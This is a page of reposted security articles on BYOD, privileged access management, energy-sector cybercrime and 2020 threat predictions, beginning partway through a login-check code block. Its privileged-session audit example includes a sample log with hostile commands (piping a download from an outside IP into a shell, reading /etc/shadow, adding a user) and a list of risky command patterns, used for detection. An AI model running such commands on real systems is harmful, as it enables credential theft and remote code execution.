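    if acct.role == "vendor":
        ip = ipaddress.ip_address(source_ip)
        if not any(ip in net for net in acct.allowed_networks):
            return False, "source not allowed"
    # compare_digest: constant-time, so timing does not reveal how much of the hash matched
    if not hmac.compare_digest(hash_password(password, acct.salt), acct.pw_hash):
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.failures = 0
            acct.locked_until = now + LOCKOUT_SECONDS
            return False, "locked"
        return False, "bad password"
    acct.failures = 0
    return True, "ok"
```

In a real deployment the failure counters would live in shared storage so that an attacker cannot spread attempts across web workers, and the vendor allowlist and expiry would come from the vendor contract rather than from code; the point of the vendor branch is that a stolen vendor password alone is not enough to reach the administrative interface.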


BYOD Adoption and Mobile Threats Increase, Can Enterprise Data Security Keep Up?

By Sue Poremba | 4 min read | Original post from Securityintelligence.com

While most security professionals have come to embrace — or, at least, accept — bring-your-own-device (BYOD) policies, leadership still often lacks confidence in the data security of employees’ personal phones, tablets, and laptops.

In a recent study from Bitglass, 30 percent of the 400 IT experts surveyed were hesitant to adopt BYOD due to security concerns such as data leakage, shadow IT and unauthorized data access. As the General Data Protection Regulation (GDPR) and other data privacy mandates go into full swing, it’s more important than ever for organizations to monitor and protect enterprise data on mobile devices. However, BYOD may still be the Wild West of network access, especially given the rapid proliferation of new endpoints.

All these moving parts raise the question: Is BYOD security any better today than it was when personal devices first entered the workforce?

Growing Acceptance of Personal Devices in the Enterprise

It wasn’t long ago that corporate leadership balked at the idea of their employees using personal devices for work. While workers had been using their personal computers and laptops to access company networks, it wasn’t until smartphones and digital tablets were introduced that the concept of BYOD caught on. Security for these devices wasn’t very mature back then, and IT and security decision-makers had well-founded concerns.

Over the past decade, of course, phones have evolved into personal hand-held computers. According to Comscore, only 17 percent of consumers were using smartphones in 2009, compared to 81 percent in 2016. That irreversible trend, along with the rise of the internet of things (IoT) and wearable devices, linked personal technology inextricably with enterprise networks.

Employees believe they are more productive and efficient when using not only their device of choice but also their preferred software and apps. Apparently, leadership agrees: The same Bitglass study found that 85 percent of companies now allow not only employees, but even contractors, customers and suppliers to access enterprise data from their personal devices. Despite this shift, more than half of those surveyed believe mobile threats have gotten worse.

Mobile Threats Are Rising, but Security Hasn’t Changed Much

Given the ubiquity and relative insecurity of mobile devices in the workplace, it’s no surprise that criminals are targeting them. Threat actors can gain access to both corporate data and personal data from one easy-to-breach device. Basic mobile security protections, such as remote wiping and mobile device management tools, are deployed in just over half of the organizations surveyed by Bitglass. In addition, many security teams lack visibility into apps used on personal devices.

Most threat actors who attack mobile devices are after passwords, according to mobile security expert Karen Scarfone, as quoted by Wired.

“A lot of email passwords still go back and forth in the clear,” she said. “That’s a big problem.”

Passwords remain the keys to the data castle, and they are largely unencrypted and unprotected on mobile devices. This, coupled with the password reuse epidemic, means that threat actors can gain virtually unlimited access to corporate networks through personal devices.

Clearly, there’s plenty of room for improvement when it comes to mobile security. A U.S. Department of Homeland Security (DHS) study mandated by the Cybersecurity Act of 2015 found that while the federal government’s use of mobile technology is improving, “many communication paths remain unprotected and leave the overall ecosystem vulnerable to attacks.”

Similar security holes exist in the private sector. According to SyncDog, mobile devices are the most dangerous point of intrusion to corporate networks. In large enterprises in particular, “mobile devices are looked at as toys with games on them, and protecting them comes last in line to application management, network security, mainframes and other larger IT concerns.”

BYOD Security Starts With Smart Policies

How can chief information security officers (CISOs) and IT leaders ensure that employees use their personal devices in a smart, secure way? First, determine whether an employee needs to use a personal device for work at all. If a role does not require regular access to corporate networks, or a device cannot be authorized and consistently monitored, as is often the case for employees working remotely, those users should not be enrolled in the BYOD program.

Second, employees should be required — or, at least, highly encouraged — to update their device software, especially operating systems and any security software. Consider requiring all employees who use personal devices to install corporate security software and use the company’s security protocols if they are connecting to enterprise networks.

Third, communicate BYOD policies to employees and implement effective measures to enforce them. Policies should include the most basic data security best practices, such as implementing multifactor authentication (MFA), creating strong and unique passwords, using virtual private networks (VPNs) over public WiFi, and locking devices with biometric controls. In addition to protecting enterprise networks, these steps will help secure employees’ personal data on devices. But remember, a policy is useless if you don’t enforce it. People will break the rules if they know there are no consequences to pay.

When it comes to worker productivity, the embrace of BYOD has been a good thing for businesses. But in a world where cyberthreats loom large and data loss could result in huge fines and reputational damage, enterprises need to prioritize the security of their critical assets — and that of the thousands of endpoints that access them.

To learn more, read the IBM white paper, “The Ten Rules of Bring Your Own Device (BYOD).”


Busting Top Myths About Privileged Access Management

January 14, 2020 | Security and Risk | Sam Flaster | Read original article here

Today, businesses everywhere are investing in infrastructure to support growth – whether that’s moving to the cloud or automating tasks and processes.  However, the newly introduced devices, application stacks and accounts that come with this modernization all present additional opportunities for attacker exploitation. For any organization – big or small – identifying and addressing security risks across this expanding attack surface can be a formidable challenge.

Privileged access management (PAM) programs that secure pathways to critical business information are foundational to an effective corporate cybersecurity program. Why?  Attackers view privileged accounts as one of the best ways to gain a foothold within an organization’s infrastructure. In fact, the vast majority of cyber attacks involve compromised privileged credentials and PAM solutions provide a critical layer of defense.

But, while securing privileged access consistently tops the lists of projects that can reduce risk and improve operational efficiency, some misconceptions surrounding PAM persist. Today, we’re going to bust five of the most prevalent PAM myths.

Myth #1: Because privileged access exists everywhere, it is impossible to secure.

While the scope of privileged access can be intimidating based on the complexity of your environment, dedicated PAM solutions and related policies can actually shrink the attack surface by shutting down pathways to critical resources.

Leading PAM solutions can automatically map privileged credentials across cloud and hybrid environments, saving security teams significant time and effort. And for those unsure of where privileged accounts exist, there are free tools like CyberArk Discovery & Audit to help organizations gain visibility into their privileged account landscape.

Additionally, modern PAM tools also incorporate automatic rotation of SSH keys and other privileged credentials at regular intervals to eliminate the time-consuming and error-prone manual tasks required for regulatory compliance. Meanwhile, automatic session monitoring capabilities systematically record all privileged account sessions and identify which users are operating privileged accounts.

Finally, the best PAM tools also provide detailed session monitoring recordings that can be sorted into searchable metadata for compliance and incident response teams and leverage user behavior analytics to automatically detect and suspend risky privileged sessions.
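As an added example, not from the article or from any PAM vendor's product, of turning session recordings into searchable metadata and flagging risky sessions automatically: the record format, the business-hours and trusted-network policy, the list of risky command fragments and the four sample sessions below are all constructed for the illustration.

```python
"""Indexing privileged-session records and flagging the ones that need review (added example).

The JSON-lines record format, the policy constants and the sample sessions are
constructed for this illustration, not taken from any product.
"""
import json
from datetime import datetime, timezone

# Constructed sample: one JSON record per recorded privileged session.
SESSION_LOG = """
{"session_id":"s-1001","user":"alice","target":"db-prod-01","account":"root","protocol":"ssh","start":"2020-01-13T09:12:00Z","end":"2020-01-13T09:25:00Z","source":"10.20.0.15","commands":["systemctl status postgresql","tail -n 100 /var/log/postgresql/postgresql.log"]}
{"session_id":"s-1002","user":"bob","target":"dc-01","account":"Administrator","protocol":"rdp","start":"2020-01-13T02:40:00Z","end":"2020-01-13T03:05:00Z","source":"10.20.0.31","commands":["ntdsutil","net user svc_backup /add"]}
{"session_id":"s-1003","user":"vendor-pos","target":"pos-gw-02","account":"posadmin","protocol":"ssh","start":"2020-01-13T14:00:00Z","end":"2020-01-13T14:03:00Z","source":"198.51.100.9","commands":["cat /etc/shadow","curl http://203.0.113.7/x.sh | sh"]}
{"session_id":"s-1004","user":"carol","target":"web-03","account":"deploy","protocol":"ssh","start":"2020-01-13T11:00:00Z","end":"2020-01-13T11:10:00Z","source":"10.20.0.15","commands":["git pull","systemctl restart nginx"]}
"""

# Assumed policy: when privileged work normally happens and where it may come from.
BUSINESS_HOURS = range(7, 20)          # 07:00-19:59 UTC
TRUSTED_SOURCES = ("10.20.0.",)        # jump hosts / admin VLAN prefix
# Command fragments that warrant analyst review (credential access, persistence, remote code fetch).
RISKY_FRAGMENTS = ("/etc/shadow", "ntdsutil", "net user", "| sh", "| bash", "mimikatz")


def parse_sessions(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def index_sessions(sessions):
    """Searchable metadata: who used which privileged account on which target."""
    idx = {}
    for s in sessions:
        idx.setdefault((s["user"], s["account"], s["target"]), []).append(s["session_id"])
    return idx


def risk_findings(session):
    """Apply the three policy rules to one session; an empty list means nothing to review."""
    findings = []
    start = datetime.fromisoformat(session["start"].replace("Z", "+00:00"))
    if start.astimezone(timezone.utc).hour not in BUSINESS_HOURS:
        findings.append("off-hours")
    if not session["source"].startswith(TRUSTED_SOURCES):
        findings.append("untrusted source " + session["source"])
    for cmd in session["commands"]:
        for frag in RISKY_FRAGMENTS:
            if frag in cmd:
                findings.append("risky command: " + cmd)
                break
    return findings


def audit(text):
    """Return {session_id: [findings]} for the sessions an analyst should look at."""
    return {s["session_id"]: f for s in parse_sessions(text) if (f := risk_findings(s))}


def find_sessions(text, user=None, account=None, target=None):
    """Query the index, e.g. every session in which anyone used root on db-prod-01."""
    out = []
    for (u, a, t), ids in index_sessions(parse_sessions(text)).items():
        if user in (None, u) and account in (None, a) and target in (None, t):
            out.extend(ids)
    return sorted(out)


if __name__ == "__main__":
    for sid, findings in audit(SESSION_LOG).items():
        print(sid, findings)
```

Running it flags the 02:40 domain-controller session that creates a new user with ntdsutil in play, and the vendor session from an untrusted address that reads /etc/shadow and pipes a download into a shell; the two routine sessions are left alone. In a product the same rules would run on live session streams so that a flagged session can be suspended rather than merely reported.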

The impossible just became achievable.  Between account mapping, automatic credential rotation and detailed session monitoring, privileged access can be uncovered, managed and secured.

Myth #2: Privileged access management tools are challenging for administrators to manage.

That may have been true in the past, but today’s PAM solutions greatly ease and simplify administrator workloads. Collecting all privileged accounts in a centralized vault eliminates the need to manually search for and manage privileged credentials. In increasingly dynamic network environments, centrally locating the necessary tools to appropriately manage users’ privileged access can improve the efficiency and efficacy of IT projects. Automation tools also enable administrators to eliminate time-intensive tasks in favor of more strategic initiatives.

Especially as organizations move to the cloud, PAM tools can be particularly useful to address emerging risks of cloud migration. When adopting a hybrid or public cloud infrastructure, even slight misconfigurations can create new vulnerabilities.  Having holistic tools in place to discover risks associated with privileged access can improve an organization’s security posture.

Myth #3: Identity and Access Management (IAM) solutions are sufficient to protect privileged access.

It’s true that IAM tools and Multi-Factor Authentication (MFA) methods are strategic investments – but they do not replace the value of a PAM solution.  PAM solutions can independently protect privileged accounts with human and non-human identities like application accounts used in robotic process automation (RPA) or DevOps – something IAM solutions simply aren’t designed to do.

Focused on risk reduction, PAM tools can also protect privileged business users from sophisticated social engineering attacks capable of bypassing MFA. Most importantly, IAM tools require a direct connection to user directories such as Active Directory (AD), and those connections are often hosted on-premises. If any on-premises server is compromised, attackers can take control of AD, carry out Kerberos attacks such as Golden Ticket, and persist undetected in the company's network. PAM can provide a vital security layer for the servers that host IAM's direct connection to directories like AD.

To create a strong enterprise security fabric, IAM systems and PAM solutions should be deployed as collaborative tools.

Myth #4: Privileged Access Management solutions interfere with operational efficiency.

The truth is that the daily tasks of most workers don’t require elevated privileges – and therefore PAM solutions won’t impact them at all.  For those who do require elevated privileges, leading PAM tools offer a variety of user-friendly formats, including RDP, SSH and web-native access, to provide credential vaulting and session management in the background of their daily workflows. Native and transparent access provides organizations with comprehensive privileged session recordings while minimizing disruption for end users.

In fact, using PAM tools to automate time-consuming tasks for IT and security employees can improve productivity by freeing up time for higher-value projects. Audit teams can achieve the same benefits by automating compliance tasks, especially in highly regulated industries like healthcare and banking. Manually sorting through all sessions that involve privileged credentials to find high-risk activity can be extremely time consuming. PAM solutions can automate these tasks and identify risky behavior for audit teams, freeing them up to spend their time on other critical tasks.

Modern PAM solutions can actually be a boon to operational efficiency – not an impairment.

Myth #5: It’s Difficult to Calculate ROI for Privileged Access Management solutions. 

The average cost of a data breach in 2019 came in at nearly $4 million. Notably, this figure does not include the additional costs of lost business from reputation damage and theft of intellectual property. Privileged access is a focal point for organizations to demonstrate where security solutions can have a high impact.

In any security program, cost-efficiency is key. Organizations must take a risk-based approach, applying finite resources where they can achieve quick wins and long-lasting impact. And it’s in this area where PAM solutions can really shine. PAM is a high-leverage point where modest investments can achieve outsized ROI and risk reduction.

After deploying a PAM solution, organizations can scan their systems to see the decrease in the number of unsecured and unprotected systems. Since any unmanaged privileged account is a potential attack vector, each privileged account that has been discovered, secured and protected by a PAM solution is a direct reduction in the exposed attack surface and proof of ROI.
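An added example, not from the article or from CyberArk, of the post-deployment scan described above: given per-host excerpts of /etc/passwd, /etc/group and /etc/sudoers (constructed here) and the set of accounts the vault already manages (also assumed), it lists the privileged accounts that are still unmanaged and computes the coverage figure that serves as the ROI metric.

```python
"""Post-deployment scan: which privileged local accounts are still outside the vault? (added example)

Assumptions: per-host excerpts of /etc/passwd, /etc/group and /etc/sudoers collected
by some inventory job, and a set of (host, account) pairs the PAM vault manages.
All data below is constructed for the illustration.
"""
import re

HOSTS = {
    "db-prod-01": {
        "passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                   "alice:x:1001:1001::/home/alice:/bin/bash\n"
                   "toor:x:0:0::/root:/bin/sh\n"                 # second uid-0 account: classic backdoor
                   "postgres:x:26:26::/var/lib/pgsql:/bin/bash\n"),
        "group": "wheel:x:10:alice\nsudo:x:27:\n",
        "sudoers": "%wheel ALL=(ALL) ALL\n",
    },
    "web-03": {
        "passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                   "deploy:x:1002:1002::/home/deploy:/bin/bash\n"
                   "vendor:x:1003:1003::/home/vendor:/bin/bash\n"),
        "group": "sudo:x:27:deploy\n",
        "sudoers": "vendor ALL=(ALL) NOPASSWD: ALL\n# deploy gets sudo through the group\n",
    },
}

# (host, user) pairs already vaulted and rotated by the PAM solution (assumed).
VAULTED = {("db-prod-01", "root"), ("web-03", "root"), ("web-03", "deploy")}
ADMIN_GROUPS = {"wheel", "sudo", "admin"}
SUDOERS_USER_RULE = re.compile(r"^(\w+)\s+ALL=")   # group rules start with '%' and are skipped


def privileged_accounts(files):
    """Return {username: reason} for every account with root-equivalent power on a host."""
    priv = {}
    for line in files["passwd"].splitlines():
        name, _, uid, *_ = line.split(":")
        if uid == "0":
            priv[name] = "uid 0"
    for line in files["group"].splitlines():
        gname, _, _, members = line.split(":")
        if gname in ADMIN_GROUPS:
            for member in filter(None, members.split(",")):
                priv.setdefault(member, "member of " + gname)
    for line in files["sudoers"].splitlines():
        m = SUDOERS_USER_RULE.match(line.split("#", 1)[0].strip())
        if m:
            priv.setdefault(m.group(1), "sudoers rule")
    return priv


def coverage_report(hosts, vaulted):
    """List unmanaged privileged accounts and the share already under PAM control."""
    unmanaged, total = [], 0
    for host, files in hosts.items():
        for user, reason in privileged_accounts(files).items():
            total += 1
            if (host, user) not in vaulted:
                unmanaged.append((host, user, reason))
    managed = total - len(unmanaged)
    return sorted(unmanaged), (managed / total if total else 1.0)


if __name__ == "__main__":
    unmanaged, coverage = coverage_report(HOSTS, VAULTED)
    for host, user, reason in unmanaged:
        print(f"{host}: {user} ({reason}) is privileged but not vaulted")
    print(f"PAM coverage: {coverage:.0%}")
```

On the constructed data three of six privileged accounts are unmanaged (a second uid-0 login, a wheel member and a vendor with a passwordless sudo rule), so coverage is 50%; re-running the scan after each onboarding round gives the before-and-after numbers the paragraph describes. Real scans would also cover domain and service accounts, and the sudoers parser would need to follow @include directives and aliases.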

Effective security starts with protecting an organization’s most valuable information, and as a common target in most cyber attacks, unmanaged and unprotected privileged access represents a significant threat. By locking down privileged credentials, organizations deprive attackers of their preferred routes to critical data and assets. Simultaneously, session monitoring and threat detection capabilities can help teams detect and investigate misuse of privileged credentials — improving an organization’s response time to in-progress attacks.

Furthermore, many PAM solutions can integrate with other enterprise software, from IoT device gateways, DevOps tools and network devices to vulnerability management systems, enhancing their value and streamlining security operations as a whole.


CYBERCRIME AND INDUSTRY #5: HOW CYBERCRIME IS AFFECTING THE ENERGY INDUSTRY

The USA is a major consumer of energy: a North American household uses, on average, 11,698 kilowatt-hours (kWh) a year, compared with 900 kWh for the average Indian household. According to the World Energy Council, North America is also one of the biggest energy producers in the world, among the top three producers of every type of energy except hydropower.

Critical Infrastructure Security and Cyber Terrorism

Cyber espionage and cyber terrorism or sabotage are the main cyber threats targeting the energy sector. The sector holds a great deal of intellectual property and, as critical infrastructure, is a prime candidate for terrorism and sabotage, especially by state actors.

One of the root causes of vulnerability in the energy sector is that energy systems are being digitized to improve efficiency and keep up with the changing needs of the industry, including the connectivity requirements of the sector's extended supply chains. Industrial Control Systems (ICS) are part of this digitization program and are being connected to the cloud to allow distributed data capture and sharing. This has enlarged their attack surface and made them increasingly vulnerable to cyber attack. In a review entitled “Security Attacks on Industrial Control Systems”, IBM X-Force found a massive increase in ICS attacks in the three years prior to August 2015. Hacktivists and malicious insiders are carrying out these attacks, and the USA has had by far the greatest number, at around 70% of the total. The attacks are increasing because of the shift from closed systems to Internet-facing ICS.

Like many cyber security attacks, the vectors used are the usual suspects. Phishing, specifically spear phishing, is a key method being used to gain access to network resources and infect systems with malware.

A recent high-profile campaign that specifically targeted ICS was carried out by the group known as ‘Dragonfly’ or ‘Energetic Bear’. The group used three attack vectors:

1.     Spear phishing emails targeting employees and supply chain members.

2.     Watering holes, i.e. malware infected sites that were commonly used by the targeted companies.

3.     Trojanising software from third-party vendors that was used to update ICS units, so that the malware was installed through the legitimate update path.

The group attacked mainly US and European energy companies in the petroleum and electricity-generation sectors, but went after suppliers to the sector as well. Energetic Bear is a textbook example of an attack capitalizing on Internet-facing systems and supply chain infection.

The Department of Energy, in collaboration with the National Institute of Standards and Technology (NIST), has developed a set of guidelines for the energy industry, the “Cybersecurity Risk Management Process (RMP) Guideline”, to inform the risk management process within a security strategy. Sound advice such as this helps inform a robust security strategy for managing attacks targeted at the energy sector.

Personal Energy, the Internet of Things and Cyber Security

A report by MarketsandMarkets has predicted that the Internet of Things (IoT) device market within the energy sector will be worth over $22 billion by 2020. This is not surprising, as the IoT has become a popular way of controlling energy use at home and in business. Smart grids and IoT devices like the Nest thermostat generate data that can be used to pick the right energy tariff and to use energy more efficiently, with turning off lights remotely being one small example of the control the IoT gives us. However, as we have seen in previous posts, the IoT is a cybercriminal's dream. An IoT device offers a way into our homes and offices. Connected to cloud platforms to collect and analyze data, these devices are open to the same web-based threats as any other Internet-facing system. Imagine a scenario in which an attacker controls thermostats across the nation and exploits them for data extraction, for manipulating energy use, and as doors into other devices and accounts. The information gleaned from such devices could even tell burglars when you are away from home. Fortunately, white hat hackers are on the case, finding holes in IoT devices like Nest and offering fixes before malicious hackers find them.

To help stem the potential tidal wave of IoT-generated crime, the Online Trust Alliance (OTA) has built a framework of guidelines for making sure IoT devices, in the energy sector and beyond, are designed with security and data privacy in mind. It is up to the industry to follow this advice to protect consumers from IoT-based cybercrime.

Switching Off Cybercrime Not the Lights

The Stuxnet worm, which sabotaged the centrifuges of Iran's uranium enrichment programme and allegedly originated from state sponsors in the USA and Israel, is the most infamous energy sector attack in known history. We should expect Stuxnet to be eclipsed before long by a similar attack on critical infrastructure, as our energy sector reaches out into the connected world and exposes our industrial systems to cybercrime. Our energy infrastructure is too attractive a prospect for cybercriminal groups not to be planning attacks already. Those of us who work in this sector face the challenges of new ways of working, and with those challenges we must also face cybersecurity head on. Guidelines and frameworks can help us build robust and achievable security plans that work across the entire energy ecosystem.


Threats and Opportunities

Original Dutch article: http://my.socialtoaster.com/splash/cjbRT/ written by Annelies Heuvelmans

This year, Security Management again spoke with a number of cybersecurity experts about the threats we need to take into account in 2020 and the innovations that will turn the tide. A key role falls to the employee: if they do not see the importance of good security, even the best security policy collapses like a house of cards.

Malware is being sent en masse

“In recent years cybercriminals have discovered the world of operational technology (OT),” says Bastiaan Bakker, Director of Business Development at Motiv. Fortinet's Operational Security Trends Report, for instance, shows that no fewer than 77 percent of all OT managers had to deal with malware in the past 12 months.

Protecting critical infrastructure

Bakker explains: “One of the reasons for this is the far-reaching professionalisation of the criminal circuit. Cybercriminals increasingly form teams of specialists who cleverly exploit vulnerabilities within companies. In addition, state-directed hacking groups are active, carrying out attack and damage techniques within OT. We therefore see demand for specialised security of operational technology rising sharply. Given the high degree of dependence on operational systems, which control our electricity and drinking-water supply for instance, their security plays a crucial role. These environments differ significantly from classic IT environments, however. OT environments are often less easy to replace because of the amount of legacy and the high complexity of the domain.

A first step is therefore to map your OT environment. Where do links between your IT and OT environments arise? And who has access to what? Administration, and authorisation along with it, must be set up properly and maturely. Staff awareness is an important part of this. You can equip your environment with the best security solutions, but if your staff are insufficiently aware of the crucial role they play as gatekeepers of the company, that investment is of little use.”

Gamification

Mats Ros, managing security and privacy consultant at IT service provider ilionx, agrees. “Beyond technically enforcing good security, in the IT world we always come back to one point: people are the weakest link. People make mistakes, after all. Of course there are already plenty of solutions and tools to instruct people and lift them to a higher level of awareness, but actually bringing your employees along is harder. What I notice is that only fifty percent of employees really engage with these tools. That is of course far too low. The other half do not see the point and are therefore far more susceptible to, for example, a phishing email.

By using gamification (a game element that challenges employees to measure themselves against their colleagues on a scoreboard) support grows and the tooling becomes more fun. For our own ISO 27001 certification we developed a solution that does exactly this.

The SaaS solution, including scoring, looks among other things at how many questions you have answered and how often you give the right answer. Employees can compare their results with colleagues, but this can also be switched off. Achievements and certificates make it even more fun. Someone who successfully completes a quiz at night, for example, earns the ‘night owl’ achievement. In this playful way you boost support considerably and make your employees aware of the much-needed contribution they make to keeping the organisation secure.”

A world without passwords

Dirk Geeraerts, regional director for cloud protection and licensing activity at Thales, envisions a future without passwords: “The days when passwords alone offered sufficient protection are far behind us. 70 percent of employees reuse passwords between work and personal accounts. It is not surprising, then, that 81 percent of hacking-related data breaches begin with a user's identity, such as a weak or stolen password. In 2020 a world without passwords is increasingly becoming reality.”

Solving the password challenge

Geeraerts continues: “Until now, multi-factor authentication has been the most obvious answer to the password challenge. A user is granted access on the basis of their identity, something they possess and something they know. Although this method is more secure than the traditional password, it is less user-friendly because of the time-consuming steps involved. Access management solutions with passwordless security offer a way out here.

PKI or a one-time password via a token or device is used to grant users access, in combination with biometric data or a PIN. This addresses the vulnerability of traditional passwords. It also lets organisations improve login convenience and user-friendliness. What must not be forgotten, however, is that with this form of authentication too there is never a one-size-fits-all. It is always important to match the authentication method to the security needs in order to guarantee the highest level of security.”
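The one-time-password factor described above (and the multifactor authentication recommended in the BYOD piece earlier on this page) can be implemented entirely with the Python standard library. This is an added example, not code from the article, from Thales or from any product it mentions: it implements RFC 4226 HOTP and RFC 6238 TOTP, with a server-side verifier that tolerates one step of clock drift and refuses to accept the same code twice. The 30-second step, SHA-1 and 6 digits are the defaults most authenticator apps use; the seed used in the test is the RFCs' published test secret.

```python
"""HOTP (RFC 4226) and TOTP (RFC 6238) with the Python standard library (added example).

Assumptions: 30-second steps, SHA-1 and 6 digits by default (what most authenticator
apps use), a one-step drift window, and per-user state kept in memory.
"""
from __future__ import annotations

import hashlib
import hmac
import secrets
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HMAC the 8-byte big-endian counter, truncate dynamically, keep the low `digits` digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: float | None = None, step: int = 30,
         digits: int = 6, algo=hashlib.sha1) -> str:
    """TOTP is HOTP with the counter taken from the clock: floor(unix_time / step)."""
    at = time.time() if at is None else at
    return hotp(secret, int(at // step), digits, algo)


class TotpVerifier:
    """Server-side check for one user: tolerates clock drift, refuses replayed codes."""

    def __init__(self, secret: bytes, step: int = 30, digits: int = 6, window: int = 1):
        self.secret, self.step, self.digits, self.window = secret, step, digits, window
        self.last_counter = -1          # highest counter already accepted

    def verify(self, code: str, at: float | None = None) -> bool:
        at = time.time() if at is None else at
        counter = int(at // self.step)
        accepted = None
        # Check every candidate (no early exit) and compare in constant time.
        for c in range(counter - self.window, counter + self.window + 1):
            if hmac.compare_digest(hotp(self.secret, c, self.digits), code):
                accepted = c
        if accepted is None or accepted <= self.last_counter:
            return False                # wrong code, or a code that was already used
        self.last_counter = accepted
        return True


def new_secret(nbytes: int = 20) -> bytes:
    """Fresh seed, generated server-side and provisioned to the user's device once."""
    return secrets.token_bytes(nbytes)
```

The replay check matters: within the drift window a code stays valid for up to 90 seconds, so a code captured by a phishing page or shoulder-surfed would otherwise be reusable. TOTP still does not bind the code to the site it is used on, which is why the passwordless and PKI-based schemes the paragraph mentions (for example FIDO2 authenticators) resist phishing better than an OTP plus PIN.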

Managed security services that take the burden off organisations

Organisations do see the need and have the financial room to invest in security, but they lack the people to make security solutions pay off. “We therefore see growing demand for managed security services that relieve organisations of the burden entirely. This trend will strengthen in the coming years. We also see the rise of security automation. Simple incidents can be handled automatically so that engineers can focus on the complex ones. This also absorbs the shortage of security engineers,” says Twan van Ravestein, Cyber Security Expert at Telindus.

Who or what can you still trust?

“Automation will happen along several axes in 2020. With artificial intelligence and machine learning solutions you can set up the analysis of network traffic so that deviations and strange behaviour, within the customer's business context, are detected quickly.

You are then able to take the right measures automatically, for example to close leaks. Systems for User Behaviour Analytics (UBA) and Security Orchestration, Automation and Response (SOAR) are becoming ever more advanced in this way. Finally, in 2020 more and more organisations will embrace the zero trust principle and treat the network as having no perimeter. Particularly in the cloud era, you can no longer speak in terms of the secure internal network and the insecure outside world. This realisation will reach many boardrooms,” concludes Van Ravestein.

